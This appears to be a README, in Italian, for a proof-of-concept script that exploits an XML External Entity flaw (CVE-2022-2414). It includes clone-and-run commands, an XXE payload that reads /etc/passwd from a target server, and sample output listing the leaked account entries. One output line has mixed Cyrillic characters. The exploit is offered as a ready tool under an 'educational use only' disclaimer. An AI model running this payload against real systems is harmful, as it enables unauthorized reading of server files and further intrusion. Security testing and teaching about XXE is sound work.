
è uno script PoC per dimostrare lo sfruttamento di una vulnerabilità XML External Entity (XXE)
GenXMLExternalEntityExploit è uno script PoC per dimostrare lo sfruttamento di una vulnerabilità XML External Entity (XXE). Lo script utilizza payload XML per leggere file sensibili da un server di destinazione. Può essere utile per test di sicurezza, penetration testing o scopi educativi.
git clone https://github.com/geniuszly/CVE-2022-2414
cd CVE-2022-2414
python3 GenXMLExternalEntityExploit.py
TARGET_URLXML_PAYLOAD nello script per percorsi di file specifici o operazioni lato server.Per impostazione predefinita, lo script utilizza il seguente payload per leggere il file /etc/passwd:
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...
Questo strumento è destinato esclusivamente a scopi educativi e a test di sicurezza autorizzati. L'autore non è responsabile per qualsiasi uso illegale di questo strumento.